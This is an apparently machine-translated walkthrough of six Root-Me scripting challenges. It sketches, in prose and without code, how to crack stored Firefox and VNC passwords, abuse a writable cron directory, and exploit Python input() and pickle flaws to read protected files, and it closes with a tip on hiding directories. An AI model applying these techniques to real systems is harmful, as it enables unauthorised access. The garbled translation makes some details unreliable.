The App-script type of root-me

App-script is root-me the first type of topic, a total of six, the description of this type of topic is "These challenges would help you understand scripting Vulnerabilities (these topics can help you understand scripting vulnerabilities) ". The following article will introduce the six topics and their solutions, but will not give the tool name/link and the corresponding flag.

One, file--Weak permissions (File–weak permissions)

This topic only provides the SSH connection information required by the title, in fact, almost all of the app type topics in Root-me provide only connection information, and no repetition of this point. Connect to the appropriate virtual machine system via SSH, you can see two files through the "Ls-al" command:

-r--r-----1 shell1 shell1 June 1. netrc
-r--r-----1 shell1cracked shell1cracked 6. passwd

two, file-insecure storage 1 (file–insecure storage 1)

The description of the question is " Mozilla Firefox", so is related to Firefox browser, through the connection to access the title directory file, you can see a Firefox user data directory:

Dr-xr-x--x 4 shell2 shell2 4096 Feb 6. Mozilla

So the goal of this problem is to get the password stored in the insecure Firefox browser, about the browser password storage security issues can refer to the IDF lab translated article "How the browser stores passwords," from which you can learn that Firefox in the storage of user passwords by adding salt and multiple encryption, The key to this is the setting of the master password (master Password) (many Firefox users do not know or care about the settings of the master password, but there is a huge difference in the storage security of the settings). Similarly, in the user store directory of the subject, you can find the Firefox browser store password two files: key3.db and Signons.sqlite. Many people access the Signons.sqlite through the SQLite database access tool and see that there is a BASE64 encoded string that wins in sight, in fact the string is only BASE64 encoded after the encrypted data.

So, there are two ways to solve the problem, a more intuitive and effective, simple violence is to copy the user directory directly under the ". Mozilla" directory to the personal Firefox user data directory, and do a replacement, and then restart Firefox browser to view the password storage, the other way is a little bit technical content, That is, search Firefox password files (key3.db and signons.sqlite) hack tool to hack.

Iii. files-Insecure storage 2 (File–insecure storage 2)

Virtual Network computing ", but with the problem of the problem-solving ideas are similar, and borrowed from the first question of the way to do the interference, in the root directory of the topic only two files:

-r--r-----1 shell3cracked shell3cracked 9 Feb 6. passwd
Dr-xr-x--x 2 shell3 shell3 4096 Oct. VNC

According to the idea of the first question, the. passwd file here is just an interference factor, not to worry about. The focus is on the. VNC directory, since the name is VNC, it is bound to be related to VNC, so the second problem of the disintegration of the idea, the solution is also two: either search vnc password cracking tool to crack, or overwrite its own VNC configuration file. In fact, GitHub has an open source hack program.

Four, Bash–cron

This is a tangled topic, and the title shows that there is only one word-"Crontab"-that is obviously a topic related to the Linux task plan. Under the topic directory there are two files and a soft connection:

-r--r-----1 shell4cracked shell4cracked June 1. passwd
lrwxrwxrwx 1 shell4 shell4 June 1 CRON.D-/tmp/._cron
-r-xr-x---1 shell4cracked shell4 579 Nov 00:02 SHELL4

In the case of SHELL4 user login, only the operation is soft connection and SHELL4 file, so read the Shell4 file, you can see the bash script, the content of the script is inconvenient to give, It means that you do not have five minutes to execute all the tasks in the CRON.D directory, and then delete all the files under that directory. and CRON.D as a soft connection of the current user can do any operation, so the problem of the solution is also a glance-write a script to read the. passwd file.

because there are five minutes of timed execution restrictions, it takes five minutes of patience ...

V, python–input ()

The description of the title is "Feed the python! "To the effect that Python is injected, input, and so on. The goal is to obtain the contents of the. passwd file, the flag, by exploiting the vulnerability of the Python script. After SSH connection, you can see the file under the root directory of the topic:

 -r--r----- 1 shell6cracked shell6cracked   33  2014 passwd 
-r-sr-x--x  1 shell6cracked shell6        7170 may  2014 set Uid-wrapper 
-r--r----- 1 shell6        shell6         129 may  20 SETUID-WRAPPER.C 
-r-xr-x--x  1 shell6        shell6         365 June 12 14:46 shell6.py 
  

You can see that only shell6cracked users and user groups can read. passwd files, and only setuid-wrapper programs in these files have that user right, so the basic idea is to read them through the Setuid-wrapper program's user rights. passwd file 。 Fortunately Setuid-wrapper is a source, so one by one to see only two files can be viewed Setuid-wrapper.c and shell6.py, the former is through the system () Call shell6.py, while the latter is done by reading the. passwd file content against the input password, and if it is the same, print the word " well!" You can validate with this password! ", otherwise it will print" Try again;-) ".

> So, the idea of solving the problem is clear, That is, through the execution of the Setuid-wrapper program call shell6.py read. passwd file content, the vulnerability in the shell6.py comparison statement, because the user input does not directly compare the processing, there is an injection vulnerability, then only need to build a Python injection statement as set Uid-wrapper the input after execution.

VI, python–pickle

 -rwxr-x--- 1 shell5cracked shell5cracked   83 May  2013. _run 
-r-xr-x--x  1 shell5cracked shell5cracked   Mar  7  2013. passwd 
-r-- R----- 1 shell5        SHELL5         138 Nov  2012 README 
-r-x-- X--- 1 shell5cracked shell5        4763 June  1 17:11 shell5 
  

as SHELL5 user login, only can read the Readme file and execute the shell5 file, view the Readme file that the HTTP service port is 56025 (Root-me as a French site, its content will be written in French, most of the English version, The document is a purely two-sentence French, so Google translation is required. Execution of the Shell5 file will be error, so only from the port is 56025 HTTP service start, can be through curl, or through Telnet, you can also write program Access.

in the break

under Linux, with "." The starting name file can act as a hidden file, and the regular "ls" command does not directly see such files, so it is often used as a means of data/file hiding, but by adding a "-a" option to make it true. Another way to hide a directory like this is to create a "." or ".." Start with a space-named directory, such as "mkdir". ", so that even if the" ls-a "command is executed, it is often visually easy to do with". "In the Linux directory. or ".." Directory confusion, or even neglect.

(End of full text)

The App-script type of root-me